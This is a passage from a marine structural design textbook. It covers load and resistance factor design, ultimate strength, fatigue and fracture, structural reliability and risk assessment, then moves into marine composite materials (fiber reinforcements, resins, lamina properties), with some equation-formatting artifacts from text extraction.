resistance factors where only one load factor and one material factor are used, for the sake of simplicity. To account for the uncertainties in the strength parameters, the design resistance Rd is defined as characteristic resistance Rk divided by the material factor gm. The characteristic load effect Sk is also scaled up by multiplying by the load factor gf. The values of the load factor gf and material factor gm are defined in design codes. They have been calibrated against the WSD criteria and the inherent safety levels in the design codes. The calibration may be conducted using structural reliability methods that allow us to correlate the reliability levels in the LRFD criteria with the WSD criteria and to ensure the reliability levels will be greater than or equal to the target reliability. An advantage of the LRFD approach is its simplicity (in comparison with direct usage of the structural Figure 1.1 Use of load and resistance factors for strength design. 6 Chapter 1 reliability methods) while it still accounts for the uncertainties in loads and structural capacities based on structural reliability methods. The LRFD is also called the partial safety factor design. While the partial safety factors are calibrated using the structural reliability methods, the failure consequence may also be accounted for through the selection of the target reliability level. When the failure consequence is higher, the safety factors should also be higher. Use of the LRFD criteria may provide unified safety levels for the whole structures or a group of the structures that are designed according to the same code. 1.2 Strength and Fatigue Analysis Major factors that should be considered in marine structural design include • • • Still water and wave loads, and their possible combinations Ultimate strength of structural components and systems Fatigue/fracture in critical structural details. Knowledge of hydrodynamics, buckling/collapsing, and fatigue/fracture is the key to understanding structural engineering. 1.2.1 Ultimate Strength Criteria Ultimate strength criteria are usually advocated in design codes for various basic types of structural components such as • • • • • columns and beam-columns plates and stiffened panels shells and stiffened shells structural connections hull girders. An illustration of the Euler buckling strength is given in Figure 1.2 for pinned columns under compression. Due to the combination of axial compression and initial deflection, the column may buckle when the axial compression approaches its critical value, p2 EI l2 where l and EI are column length and sectional bending rigidity, respectively. Due to buckling, the lateral deflection d will increase rapidly. PCR &frac14; (1.2) Initiation of yielding usually occurs in the most loaded portion of the structural members. As the yielding portion spreads, the bending rigidity of the structural component decreases Introduction 7 δ Pcr Pcr Buckled Shape L Figure 1.2 Buckling of pinned columns. and consequently buckling occurs. For structural members other than unstiffened thinwalled shells, ultimate strength is reached when inelastic buckling occurs. The design of the components in ships and offshore structures is mainly based on relevant classification rules as well as API and ISO codes. The classification rules are applicable to ocean-going ships, mobile offshore drilling units, and floating structures. For offshore structural designs, however, API and ISO codes are more frequently applied. It should be pointed out that final fracture is also part of the ultimate strength analysis. The assessment of the final fracture has been based mainly on fracture mechanics criteria in British standard PD6493 (or BS7910) and American Petroleum Institute code API 579. In fact there is a similarity between buckling strength analysis and fracture strength analysis, as compared in Table 1.1. In general, the strength criteria for code development may be derived using the following approaches: • • • • • Derive analytical equations based on plasticity, elasticity, and theory of elastic stability; Conduct nonlinear finite element analysis of component strength; Collect results of mechanical tests; Compare the analytical equations with the results of finite element analysis and mechanical testing; Modify the analytical equations based on finite element results; Table 1.1: Comparisons of buckling strength analysis and fracture strength analysis Loads Imperfection Linear solution Design criteria Buckling Strength Fracture Strength Compressive/shear force Geometrical and residual stress due to welding, etc. Elastic buckling Curve fitting of theoretical equations to test results Tensile loads Defects due to fabrication and fatigue loads Linear fracture mechanics Curve fitting of theoretical equations to test results 8 Chapter 1 • • Finalize the upgraded formulations through comparisons with numerical and mechanical tests; Further calibrate the derived strength equations on design projects. From the above discussions, it is clear that the theoretical knowledge and practical design experience are vital for the successful development of ultimate strength criteria. As an alternative to the criteria in rules and codes, mechanical testing and finite element analysis may be applied to determine the ultimate strength of structural components. For simple components, the prediction of finite element analysis and rule criteria is usually close to the results of mechanical testing. Therefore, mechanical testing is now mainly applied to subjects in which less experience and knowledge have been accumulated. Subjects that warrant future research on ultimate strength analysis include • • • • Development of strength equations for combined loads Calibration of partial safety factors using risk assessment and structural reliability analysis Standardization of the finite element models and benchmark of the models Development of procedures for the determination of partial safety factors for finite element analysis and strength design based on testing. 1.2.2 Design for Accidental Loads The accidental loads that should be considered in the design of ship and offshore structures are, for example, • • • • Ship collision and impacts from dropped objects offshore Ship grounding Fire/explosion Freak waves. The term “accidental loads” refers to unexpected loads that may result in a catastrophe, causing negative economical, environmental, material consequences, and the loss of human life. Extreme and accidental loads differ in the sense that the magnitude and frequency of the extreme loads can be influenced to a small extent by the structural design, whereas active controls may influence both the frequency and the magnitude of accidental loads. The design for accidental loads includes determining the design of the loads based on risk consideration, predicting the structural response using rigid-plastic analytical formulation and/or nonlinear FEM and selecting the risk-based acceptance criteria. Traditionally rigidplastic analytical formulations have been popular for the designs against accidental loads because large plastic deformation is usually the mechanism for energy absorption in accidents. In recent years, the nonlinear finite element analysis has been used to simulate Introduction 9 the structural behavior in accidental scenarios and to design the structure for the performance standards. Use of the finite element analysis enables us to deal with complex accidental scenarios and to better predict the structural response. 1.2.3 Design for Fatigue Fatigue damage and defects may threaten the integrity of marine structures. This concern is aggravated as the cost of repair and loss of production increases. Fatigue design is an important subject due to use of higher strength materials, severe environmental conditions, and optimized structural dimensions. In recent years there has been a rapid development in analysis technologies for predicting fatigue loading, cyclic stress, fatigue/fracture capacity, and damage tolerance criteria. The fatigue capacities are evaluated using the SeN curve approach or the fracture mechanics approach. The SeN curves are established by stresscontrolled fatigue tests and may generally be expressed as N &frac14; K$Sm (1.3) where N &frac14; Number of cycles to failure S &frac14; Stress range m, K &frac14; Material constants depending on the environment, test conditions, etc. The SeN curve approach is mainly applied in designs for fatigue strength, and it consists of two key components: determining a hot-spot stress and selecting appropriate SeN curves. A bilinear SeN curve is shown in Figure 1.3 where, on a logelog scale, the x-axis and y-axis are the number of cycles until failure and the stress range, respectively. The slope of the curve changes from m to r where the number of cycles is NR (&frac14;5$106 for steel). Log Δσ m Reference Point r 2 .106 5 .106 Figure 1.3 SeN curves for fatigue assessment. Log N 10 Chapter 1 Discrepancy has been observed between the hot-spot stresses predicted by different analysts or in different analyses. It is therefore important to derive an optimum procedure and standardize the analysis procedure as part of the rules/code development. In recent years, there has been a rapid development in the standardization of the SeN curves. The International Institute of Welding (IIW) has published new guidance documents on the selection of SeN curves and the determination of hot-spot stresses. In the IIW code, the SeN curves are named according to their reference stress range DsR that corresponds to (2$106) cycles. With the increasing use of finite element analysis, a design approach based on the hot-spot stress will be increasingly popular. The fatigue uncertainties are due to several factors such as • • • • • Selection of environmental conditions such as sea states and their combinations Extrapolation of fatigue stresses in the hot-spot points Selection of design codes such as the SeN curves and the stress calculations Combination of wave-induced fatigue with the fatigue damages due to vortex-induced vibrations and installation Selection of safety factors and inspection/repair methods. The accumulative fatigue damage for a structural connection over its life cycle is usually estimated using Miners rule, which sums up the damage caused by individual stress range blocks. X ni Dallow (1.4) D&frac14; Ni where ni and Ni denote the number of stress cycles in stress block i, and the number of cycles until failure at the i-th constant amplitude stress range block. Dallow is the allowable limit that is defined in design codes. A simplified fatigue analysis may be conducted assuming that stress ranges follow Weibull distributions. This kind of analysis has been widely applied in classification rules for fatigue assessment of ship structures. The Weibull parameters for stress distribution have been calibrated against in-service fatigue data for ships and more refined fatigue analysis. The value of Weibull parameters may be found from classification rules, as a function of ship lengths and locations of interest. Alternatively, in offshore design codes API RP2A, a simplified fatigue analysis is proposed assuming the wave height follows Weibull distributions. There are three approaches for predicting accumulated fatigue damages accounting for wave scatter diagrams, namely, • • Frequency domain (e.g., spectral fatigue analysis based on Rayleigh model or bimodel) Time domain (which could account for nonlinearities and contact/friction due to soilestructure interactions) Introduction 11 • A mixture of frequency-domain and time-domain approaches (e.g., using the stress range spectrum from frequency-domain fatigue analysis and the rain-flow counting approach to sum up the fatigue damages due to individual sea states). As an alternative to the SeN curve approach, fracture mechanics is now used for evaluating the remaining strength of the cracked structural connections and in planning inspections of welded connections. There is an approximate linear relationship between the crack growth rate and the DK on a logelog scale. This is generally characterized by the Paris equation da &frac14; C&eth;DK&THORN;m dN (1.5) DK &frac14; Kmax Kmin (1.6) where Kmax and Kmin are the maximum and minimum values of the stress intensity factor at the upper and lower limit stresses during a cyclic loading. The values of material properties C and m may be found using design codes for typical materials that are used in marine structures and other types of steel structures. The stress intensity factors may be available from handbooks for simplified structural and defect geometries and loads. 1.3 Structural Reliability Applications 1.3.1 Structural Reliability Concepts Component reliability is concerned with the failure probability modeled by a single limitstate function. It is a fundamental part of the structural reliability analysis since all marine structures are composed of their components. The concept of structural reliability is illustrated in Figure 1.4, where both the load and the strength are modeled as random variables. Failure occurs when the load exceeds the strength. Denoting the probability density function for load and strength as FS(x) and FR(x), respectively, the failure probability may be expressed as ZN Pf &frac14; P&eth;S R&THORN; &frac14; FS &eth;x&THORN;FR &eth;x&THORN;dx (1.7) 0 System reliability deals with the evaluation of failure probability where more than one limit-state function must be considered. There are two types of basic systems: series systems and parallel systems. A system is called a series system if it is in a state of failure whenever any of its elements fails. Such systems are often referred to as weakest link 12 Chapter 1 Load Strength Figure 1.4 Structural reliability concepts. systems. A typical example of this is marine pipelines and risers, where a parallel system fails only when all of its elements fail. Structural reliability analysis has been used to determine load combinations, derive design criteria, and plan in-service inspections. The life-cycle cost of a marine structure consists of • • • Initial investment relating to the steel weight and manufacturing process Maintenance cost Loss caused by damage or failureda risk resulted expenditure. Degradation or failure of a structural system may lead to a reduction/shutdown of the operation and loss/damage of the structure. The owner and the builder want a structure with a low initial cost, the highest possible operating margin, and an extendable operating period. A life-cycle cost model based on probabilistic economics may be a useful tool for improving the design analysis, inspection, and maintenance. This is further illustrated in Figure 1.5 where the total cost is the sum of the initial investment and maintenance cost plus the loss caused by structural damage/failure. A target reliability level may then be estimated based on cost optimization, if it is higher than the value required by legislative requirements. 1.3.2 Reliability-Based Calibration of Design Factor One of the structural reliability applications is the calibration of safety factors for structural design. The calibration process may help achieve a consistent safety level. The safety factors are determined so that the calibrated failure probability for various conditions is as close to the target safety level as possible. The following steps should be taken when conducting a reliability-based code calibration: • • Step 1: Identify potential failure modes for the given design case Step 2: Define design equations Cost Introduction 13 Total cost Loss caused by failure Initial investment and maintenance cost Reliability Optimum reliability Figure 1.5 Target reliability and minimization of life-cycle cost. • • • • • • Step 3: Form limit-state functions Step 4: Measure uncertainties involved with random variables of the limit-state functions Step 5: Estimate failure probability Step 6: Determine the target safety level Step 7: Calibrate safety factors Step 8: Evaluate the design results. The load and resistance factors (or safety factors) in the design criteria may be calibrated using risk/reliability methods. 1.3.3 Requalification of Existing Structures Requalification of existing ship and offshore structures is one of the important subjects for structures in operation. The requalification is conducted when the environmental design conditions change, and the structure has degraded due to corrosion, fatigue, and possible impact loads. Corrosion defects may significantly reduce the ultimate and fatigue strength of the structures. Various mathematical models have been developed to predict the future corrosion development in structures such as pipelines, risers, and platings. Various methods have been applied by the industry to measure the amount, locations, and shapes of corrosion defects, as all these are crucially important for strength and fatigue assessment. In many cases, the use of nonlinear analysis of loads, structural response, and risk/ reliability methods is required to fully utilize the design margins. The requalification may be conducted using the strength and fatigue formulations, and the risk/reliability methods discussed in this book. 14 Chapter 1 1.4 Risk Assessment 1.4.1 Application of Risk Assessment Risk assessment and management of safety, health, and environment protection (HSE) have become an important part of the design and construction activities. Use of risk assessment in the offshore industry dates back to the second half of the 1970s when a few pioneer projects were conducted with an objective to develop analysis methodologies and collect incident data. At that time, the methodologies and the data employed were used for some years by the nuclear power and chemical industries. The next step in the risk assessment development came in 1981 when the Norwegian Petroleum Directorate issued their guidelines for safety evaluations. These guidelines required that a quantitative risk assessment be carried out for all new offshore installations in the conceptual design phase. Another significant step was the official inquiry led by Lord Cullen in the United Kingdom following the severe accident of the Piper Alpha platform in 1988. In 1991, the Norwegian Petroleum Directorate replaced the guidelines for safety evaluations issued in 1981 with regulations for risk analysis. In 1992, the safety case regulation in the United Kingdom was finalized and the offshore industry in the United Kingdom took up risk assessments as part of the safety cases for their existing and new installations. In 1997 formal safety assessments were adopted by IMO as a tool for evaluating new safety regulations for the shipping industry. 1.4.2 Risk-Based Inspection Based on risk measures, the development of a system-level, risk-based inspection process involves the prioritization of systems, subsystems, and elements and the development of an inspection strategy (i.e., the frequency, method, and scope/sample size). The process also includes making decisions about the maintenance and repair. The risk-based inspection method, using inspection results, may also be applied for updating the inspection strategy for a given system, subsystem, or component/element. The important features of the risk-based inspection method include • • • • The use of a multidisciplinary, top-down approach that starts at the system level before focusing the inspection on the element level; The use of a “living” process that is flexible, strives for completeness, and can be easily implemented; The use of qualitative and quantitative risk measurements; The use of effective and efficient analytical methods, which provide results that are sound and familiar to inspection personnel. Introduction 15 A risk-based inspection approach may be developed based on the evaluation of structural performance for fatigue/corrosion, fracture mechanics, corrosion engineering, structural reliability, and risk assessment. 1.4.3 Human and Organization Factors Statistics show that over 80% of the failures are initially caused by the so-called human and organization factors. Figure 1.6 shows the interaction among the structure, human, and organization and management system. Human behavior, organizational culture, and management of HSE will all influence the structural safety. 1.5 Layout of This Book Risk-based limit-state designs, combining probabilistic methods with FEM-based structural analysis, will be widely accepted and implemented by the industry for the cost-effective and safe design and operation of marine structures. The purpose of this book is to summarize these technological developments in order to promote advanced structural design. The emphasis on FEM, dynamic response, risk/reliability, and information technology differentiates this book from existing ones. Figure 1.7 illustrates the process of a structural design based on finite element analysis and risk/reliability methods. There are several well-known books on marine/offshore hydrodynamics, for example, Bhattacharyya (1978), Sarpkaya and Isaacson (1981), Chakrabarti (1987), Faltinsen (1990), CMPT (1998), Jensen (2001), and Coastal Engineering Manual (CEM, 2003). However, there is a lack of books on marine/offshore structural design, ultimate strength, fatigue Structure Human Organization and Management system Figure 1.6 Humaneorganization factors in structural safety. 16 Chapter 1 Figure 1.7 Modern theory for marine structural design. assessment, and risk/reliability analysis. In an integrated manner, the current book will address modern theories for structural design/analysis and ultimate strength and fatigue criteria as well as the practical industry applications of the risk and reliability methods: Part IdStructural Design Principles (Chapters 1e7): Summarizes the hydrodynamic loads for structural designs of ships and offshore structures, and scantling of ship hulls. It also addresses the applications of the finite element technologies in marine structural design. The design by analysis procedure is also called the direct design method. Applications to practical designs are discussed for ships, fixed platforms, FPSO, TLP, Spar, and semisubmersibles. Part IIdUltimate Strength (Chapters 8e15): Presents applications of buckling and plasticity theories, as well as nonlinear finite element formulations. The nonlinear finite element analysis may also be applied to the design of structures under accidental loads such as ship collisions, groundings, fires, and explosions. Part IIIdFatigue and Fracture (Chapters 16e22): Explains fatigue mechanisms, fatigue resistance, fatigue loads and stresses, simplified fatigue analysis, spectral fatigue analysis, and fracture assessment. The basics of fatigue and fracture are provided for finite element analysts and structural engineers. Part IVdStructural Reliability (Chapters 23e28): Provides simplified methods for the application of structural reliability theories for ships and offshore structures. The objective is to explain complex theories in simplified terms. An outline of the analysis software and tools is given for readers to find references or more information. Introduction 17 Part VdRisk Assessment (Chapters 29e34): Summarizes recent industrial developments to facilitate the use of risk analysis when applied to measure and reduce risks in marine structures and their mechanical components. Risk analysis and human reliability are applied to justify and reduce risks in the economy, the environment, and human life. 1.6 How to Use This Book When this book was first drafted, the author’s intention was to use it to teach the course Marine Structural Design. However, the material presented in this book may be used for several MSc or PhD courses such as • • • • • Ship Structural Design Design of Floating Production Systems Ultimate Strength of Marine Structures Fatigue and Fracture Risk and Reliability in Marine Structures This book addresses the marine and offshore applications of steel structures. In addition to the topics that are normally covered by civil engineering books on the design of steel structures (e.g., Salmon and Johnson, 1995), this book also covers hydrodynamics, ship impacts, and fatigue/fractures. Compared to books on spacecraft structure designs (e.g., Sarafin, 1995), this book describes, in greater detail, applications of FEM and risk/ reliability methods. Hence, it should also be of interest to engineers and researchers working on civil engineering (steel structures and coastal engineering) and spacecraft structures. For more information on the use of risk/reliability-based limit-state design, reference is made to a separate book entitled “Pipelines and Risers” (Bai, 2001). Practical aspects for design and construction of floating production systems are addressed in Bai et al. (2001). References Bai, Y., 2001. Pipelines and Risers. In: Elsevier Ocean Engineering Book Series, vol. 3. London, ISBN:0-08-043712-5. Bai, Y., Ayney, C., Huang, E., Maher, J., Parker, G., Song, R., Wang, M., 2001. Design and construction of floating production systems. In: Course Notes for an Industry Training Course Led by Yong Bai and Organised with Clarion Technical Conferences in Houston and IBC in London. Bhattacharyya, R., 1978. Dynamics of Marine Vehicles. John Wiley &amp; Sons, Inc. Chakrabarti, S.K., 1987. Hydrodynamics of Offshore Structures. Computational Mechanics Publications. CMPT, 1998. In: Baltrop, N. (Ed.), Floating Structures: A Guide for Design and Analysis. Oilfield Publications, Inc. Faltinsen, O.M., 1990. Sea Loads on Ships and Offshore Structures. Cambridge Ocean Technology Series, Cambridge University Press. 18 Chapter 1 Jensen, J.J., 2001. Load and Global Response of Ships, vol. 4. Elsevier Ocean Engineering Series. Salmon, C.G., Johnson, J.E., 1995. Steel Structures, Design and Behavior, fourth ed. Harper Collins College Publishers. Sarafin, T.P., 1995. Spacecraft Structures and Mechanism. Space Technology Series, Micrcosm &amp; Kluwer Academic Publishers. Sarpkaya, T., Isaacson, M., 1981. Mechanics of Wave Forces on Offshore Structures. Van Nostrand Reinhold Co. US Army Corps of Engineers, 2003. Coastal Engineering Manual (CEM) [M]. Washington, D.C: U.S. Army Corps of Engineers. CHAPTER 2 Marine Composite Materials and Structure 2.1 Introduction Composites are relatively new to the marine industry, having only come into use since 1965. The use of composites in the marine industry has become more prevalent in recent decades, and is now well established. Traditional shipbuilding materials have been wood, steel, and aluminum; although larger vessels are constructed mainly of steel, composites are sometimes used in part for ship superstructures and interior components. Applications range from pleasure boats and military vessels to helicopter decks on offshore platforms. One of the main reasons for using these materials is their good resistance to harsh environmental conditions (Hasson and Crowe, 1988). Table 2.1 shows the advantages of composites. 2.2 The Application of Composites in the Marine Industry Glass-fiber reinforced plastics (GRP), one form of fiber-reinforced plastics (FRP), were first introduced in the 1940s for Navy personnel boats, as shown in Figure 2.1. The first major interest in commercial FRP vessels was in the fishing industry, starting in the late 1960s with the construction of FRP shrimp trawlers. Since that time, the use of FRP materials has become universally acceptable in yachts, pleasure crafts, performance crafts (i.e., racing boats), and small commercial vessels such as fishing trawlers. Today, approximately 50% of commercial fishing vessels are of FRP construction, and their use in the recreational boating industry is well recognized and established. Canoes, kayaks, sailboats, powerboats, and performance craft are all good examples of crafts made almost exclusively of composites (Andrew et al., 1998). As lightweight construction is an important feature, composites have proven to be very valuable to state-of-the-art vessels. Other commercial uses include deep sea submersibles, navigational aids (buoys), and offshore engineering applications (i.e., offshore drilling platforms and pilings). In lifeboats and utility boats, where longevity and low maintenance are important (primarily for lifeboats, which may sit out of the water in the weather for many years), FRP construction has proven to be very effective and economical, as shown in Figure 2.2. Marine Structural Design. http://dx.doi.org/10.1016/B978-0-08-099997-5.00002-2 Copyright &copy; 2016 Elsevier Ltd. All rights reserved. 19 20 Chapter 2 Table 2.1: The advantages of composites (Galanis, 2002) Composite Property Advantage to Marine Industry Corrosion resistance Lightweight Monolithic seamless construction of complex shapes Near net shape and good finish Tailor ability Nonmagnetic Nonreflective Inherently damping Radar/acoustically transparent Low thermal conductivity Multiple domestic sources Design cascading effect Longer life of component and reduced maintenance Greater payload capacity, increased depth, higher speeds, easier handling/installation Easier manufacturing of complex shapes Reduced need for secondary machining, reduced material waste, reduced painting needed Improved performance of component Signature reduction, reduced galvanic corrosion Reduced radar cross section Radiate noise reduction Improved radar/sonar performance Improved fire performance Availability of raw materials Improved performance of one component 2.2.1 Ocean Environment As known, the environment in the ocean is very rough. Recent studies estimate that the direct cost of corrosion in the United States is nearly $300 billion dollars per year. On the open sea, waves can commonly reach 7 m in height or even up to 15 m in extreme weather. As shown in Figure 2.3 there are even some reports of rogue waves that have exceeded 30 m in height. Applications of composite materials in the marine industry are extensive, ranging from pleasure boats and military vessels to helicopter decks on offshore platforms. How can composites be used in this extreme environment? One of the main reasons for using these materials is because of their good resistance to harsh environmental conditions. Figure 2.1 First boat constructed from composite. Marine Composite Materials and Structure 21 Scandinavian performance marine vehicles Large composite hull fabrication Offshore wind energy Ocean tidal energy Figure 2.2 Composites in different commercial uses. Figure 2.3 Corrosion and extreme waves. FRP composites potentially offer significant weight savings in surface warships and fast ferries and may be considered at a number of levels: • • • • Superstructures Masts Secondary hull structures (internal decks and bulkheads, fairings) Primary hull structure. 22 Chapter 2 FRP composites are now established as marine construction materials and their long-term behavior is well understood. By following a logical approach to analysis, testing, and trials as designs are developed, highly durable and cost-effective ship structures result. 2.2.2 Application in the Shipbuilding Industry There is an increasing worldwide demand for small, low signature, long range/endurance, and low cost ships for close in-shore operations. The optimum size of such a ship is still evolving but ships in the range of 300 foot long and 1200 ton displacement would appear to be representative of the class. As seen in Figure 2.4, this 160 foot composite motor yacht is typical of infused hulls produced by Christensen. The company has plans to produce a 186 foot, 500&thorn; GT (gross tonnage) yacht, which will be constructed in a purpose-designed facility in Tennessee. Pleasure Boats Industry Small pleasure boats have been built from composites since before 1965. The principal fabrication route is the hand lay-up method. There is an increasing number of fast passenger vessels under construction and the design of such vessels will be used to illustrate the origins of safety factors in design. For large ships the hull and most bulkheads must be noninflammable, thus excluding polymeric composites. For smaller boats and fishing vessels the rules are less strict. Figure 2.4 Composite motor yacht. Marine Composite Materials and Structure 23 Recreational Applications The development of composite material technology in recreational boats has come the closet to matching the advances made for aircraft. Composite use has soared in the recreational marine industry due to economic and operational factors that are different than those in commercial and naval shipbuilding. Uses in the recreational boating industry are well recognized and established. Canoes, kayaks, sailboats, power boats, and performance craft are all good examples of craft made almost exclusively of composites. Where lightweight construction is an important feature, such as for racing powerboats and sailboats, composites have proven to be very valuable to the state of the art of these vessels. Another advantage of FRP or other composite construction, especially in recreational boats, is the ease of repair compared to wood or metal structures. Commercial Applications Cost is a major concern in commercial shipbuilding because of international competition. Composite usage has extended to fishing trawlers, lifeboats, passenger ferries, and larger ships such as cargo ships and tankers. Industrial submersibles for research and inspection have also been made with composites to help them achieve their requirements. Military Applications The most significant naval application of FRP has been in the construction of mine countermeasure vessels as shown in Figure 2.5. The growth of composite use on naval vessels has been hinged by performance requirements and the need to keep cost to a minimum. The Navy and Army have integrated several applications of composites into their vehicles, namely small boats, submarines, patrol craft, and minesweepers. As seen in Figure 2.6 other components, ranging from small equipment brackets to propellers, have also proven effective. The development of passenger ferries from 1995 to 2015 has made great strides with regard to speed and economy due to the increased use of composite materials. Due to current regulations in the United States, the use of composites in the passenger ferry market is limited primarily to relatively small (up to 150 passengers) commuter-type vessels. In European countries, there exist some larger passenger and automobile ferries capable of very high speeds. 2.2.3 Marine Aviation Vehicles and Off-Shore Structure Howard Hughes’ Spruce Goose was 218 feet long with a 320 foot wingspan and designed to carry 700 soldiers. At 181 tons at takeoff, the flying boat flew only about one mile in 24 Chapter 2 Figure 2.5 Mine countermeasure vessels. Figure 2.6 Large naval composite marine structures. Marine Composite Materials and Structure 25 1947. In 1984, the Dornier Company introduced an all-composite, 12 passenger amphibian transport as seen in Figure 2.7. StatoiHydro (Norway) is investing $79M to build a 2.3 MW offshore windmill. The floating wind turbine can be anchored in water depths from 120 to 700 m. 2.3 Composite Material Structure Composite materials are basically hybrid materials formed of multiple materials in order to utilize their individual structural advantages in a single structural material (Civgin, 2005). A composite material is defined as consisting of a resin matrix reinforced with a fibrous material (i.e., glass, carbon, or polymer), as shown in Figure 2.8. The fibers are the part of the composite material that contributes to the strength while the matrix holds the fibers together (Mohan and Gurit, 2008). Figure 2.7 All-composite amphibian transport. Figure 2.8 Composite laminates cross section. 26 Chapter 2 A composite material consists of two or more constituent materials combined in such a way that the resulting material has more useful applications than the constituent materials alone. The constituent materials play an important role in the development of the final material properties. Advanced composite materials used in structural applications are obtained by reinforcing matrix material with continuous fibers, which have high strength and stiffness properties. The selection of a composite material for any application will involve the selection of the reinforcing fiber and matrix, and their fractional volume in the resulting material (Ratwani, 2002). In practice, most composites consist of a bulk material (the matrix) and a reinforcement of some kind, added primarily to increase the strength and stiffness of the matrix. This reinforcement is usually in the form of fiber. Today, the most common man-made composites can be divided into three main groups: polymer matrix composites, metal matrix composites, and ceramic matrix composites, as seen in Figure 2.9. In this section, polymer matrix composites are mainly introduced. These are the most common composites and will be the main area of discussion in this guide. FRP (or plastics) composites use a polymer-based resin as the matrix, and a variety of fibers such as glass, carbon, and aramid as the reinforcement. 2.3.1 Fiber Reinforcements Fiber is an important constituent in composites. A great deal of research and development has been done with the fibers on the effects for the different types, volume fractions, architecture, and orientations. The fiber generally occupies 30e70% of the matrix volume. The fibers can be chopped, woven, stitched, and/or braided. Usually, they are treated with sizings such as starch, gelatin, oil, or wax to improve the bond, as well as binders to PMC MMC HC CMC Carbon/Carbon Figure 2.9 The most man-made composites (Vinson and Sierakowski, 2008). Marine Composite Materials and Structure 27 improve the handling. The most common types of fibers used in advanced composites for structural applications are fiberglass, aramid, and carbon. Fiberglass is the least expensive while carbon is the most expensive. The cost of aramid fibers is about the same as that of the lower grades of carbon fiber. Other high-strength high-modulus fibers, such as boron, are also now considered to be economically prohibitive (Podolny, 1996). Glass Fibers Glass fibers can be divided into three classes: E-glass, S-glass, and C-glass. The E-glass is designed for electrical use and the S-glass for high strength. The C-glass is designed for high corrosion resistance, and is not in use for civil engineering applications. Of the three fibers, the E-glass is the most common reinforcement material used in civil structures. It is produced from limeealuminaeborosilicate, which can be easily obtained from an abundance of raw materials such as sand. The fibers are drawn into very fine filaments with diameters ranging from 2 to 13 10e6 m. The glass fiber strength and modulus can degrade with increasing temperature. Although the glass material creeps under a sustained load, it can be designed to perform satisfactorily. The fiber itself is regarded as an isotropic material and has a lower thermal expansion coefficient than that of steel. Depending on the glass type, filament diameter, sizing chemistry, and fiber form, a wide range of properties and performance can be achieved (Slater and Houlston, 1980), as shown in Table 2.2. Aramid Fibers Aramid fiber is a man-made organic polymer (an aromatic polyamide) produced by spinning a solid fiber from a liquid chemical blend. The bright golden yellow filaments produced can have a range of properties, but all have high strength and low density, which give very high specific strengths. All grades have good resistance to impact, and lower modulus grades are used extensively in ballistic applications. Compressive strength, however, is only similar to that of E-glass. The aramid fibers have excellent fatigue and creep resistance. Although there are several commercial grades of aramid fibers available, the two most common ones used in structural applications are Kevlar 29 and Kevlar 49. The Young’s modulus curve for Kevlar 29 is linear to a value of 83 GPa, but then becomes slightly concave upward to a value of 100 GPa at rupture; whereas for Kevlar 49 the curve Table 2.2: Properties of glass fibers (Zweben, 1989) Typical Properties 3 Density (g/cm ) Young’s modulus (GPa) Tensile strength (GPa) Tensile elongation (%) E-glass S-glass 2.60 72 1.72 2.4 2.50 87 2.53 2.9 28 Chapter 2 is linear to a value of 124 GPa at rupture (see Table 2.3). As an anisotropic material, its transverse and shear modulus are an order of magnitude less than those in the longitudinal direction. The fibers can have difficulties achieving a chemical or mechanical bond with the resin. Carbon Fibers The graphite or carbon fiber is made from three types of polymer precursors: polyacrylonitrile fiber, rayon fiber, and pitch. The tensile stressestrain curve is linear to the point of rupture. Although there are many carbon fibers available on the open market, they can be arbitrarily divided into three grades, as shown in Table 2.4. They have lower thermal expansion coefficients than both the glass and the aramid fibers. The carbon fiber is an anisotropic material, and its transverse modulus is an order of magnitude less than its longitudinal modulus. The material has a very high fatigue and creep resistance. Since its tensile strength decreases with increasing modulus, its strain at rupture will also be much lower. Because of the material brittleness at higher modulus, it becomes critical in joint and connection details, which can have high stress concentrations. As a result of this phenomenon, carbon composite laminates are more effective with adhesive bondings that eliminate mechanical fasteners. 2.3.2 Resin Systems Resin is another important constituent in composites. The two classes of resin are the thermoplastics and the thermosets. A thermoplastic resin remains a solid at room temperature. It melts when heated and solidifies when cooled. The long-chain polymers do not chemically cross-link, and because they do not cure permanently, they are undesirable Table 2.3: Properties of aramid fibers (Zweben, 1989) Typical Properties Density (g/cm3) Young’s modulus (GPa) Tensile strength (GPa) Tensile elongation (%) Kevlar 29 1.44 83/100 2.27 2.8 Kevlar 49 1.44 124 2.27 1.8 Table 2.4: Properties of carbon fibers (Zweben, 1989) Typical Properties 3 Density (g/cm ) Young’s modulus (GPa) Tensile strength (GPa) Tensile elongation (%) High Strength High Modulus Ultrahigh Modulus 1.8 230 2.48 1.1 1.9 370 1.79 0.5 2.0e2.1 520e620 1.03e1.31 0.2 Marine Composite Materials and Structure 29 for structural applications. Conversely, a thermosetting resin will cure permanently by irreversible cross-linking at elevated temperatures. The most common resins used in composites are the unsaturated polyesters, epoxies, and vinyl esters; the least common ones are the polyurethanes and the phenolics. Table 2.5 shows some properties of the three main types of matrix resins. 2.4 Material Property In fact, one of the main advantages of composites is the complementary nature of their components. For example, thin glass fibers exhibit relatively high tensile strength, but are susceptible to damage. By comparison, most polymer resins are weak in tensile strength but are extremely tough yet malleable. The combination of these materials is more useful than either of the individual components. In this section, the stress and strain relationships for individual ply or lamina are examined. These relationships form the basic building blocks on which all subsequent analysis and design procedures are based. It is assumed that the material under consideration is orthotropic; that is, it has directional stiffness properties but certain symmetries will hold. In particular, an orthotropic material has planes of symmetry and principal material axes, such that loading along these principal axes in tension or compression does not induce shear stresses and strains; the applications of shear stresses do not produce normal strains. The individual layers of a composite, whether it is a layer in a laminate or a layer in a filament-wound structure, closely follow this assumption, with the principal material axes aligned transverse to the fibers. A lamina is a single ply (unidirectional) in a laminate, which is made up of a series of layers, as shown in Figure 2.10. When a kind of composite is considered to be an orthotropic material, the individual constituents of the fiber and the matrix are no longer explicitly considered, but instead, Table 2.5: Properties of typical matrix resins (Galanis, 2002) Material Polyester Vinyl ester Epoxy low T Epoxy high T Phenolic Specific Gravity Modulus (GPa) Tensile Strength (MPa) Strain to Fail (%) Poisson Ratio Shrinkage on Cure (%) Max Use ( C) 1.2 1.15 1.2 1.28 1.15 3 3.4 3.2 3.8 3 60 80 90 80 50 2 4 4 3 2 0.36 0.36 0.38 0.38 0.35 7 5 2 2 N/A 65 90 90 140 130 30 Chapter 2 only averaged or smeared properties in the different directions are employed. Because many composite structures are thin in the through-the-thickness direction, the theory is essentially a two-dimensional stress theory. The major point of this section is to develop the relationships between stress and strain for a thin lamina (layer) of aligned fibers in a matrix. These relationships are applicable to all continuous-fiber composites and to aligned short-fiber composites. Those short-fiber composites that have more random fiber orientations and other materials, such as continuous fibers in what is called a random mat, may be considerably less directional in stiffness; in many cases, they can be analyzed as if they were conventional isotropic materials. Figure 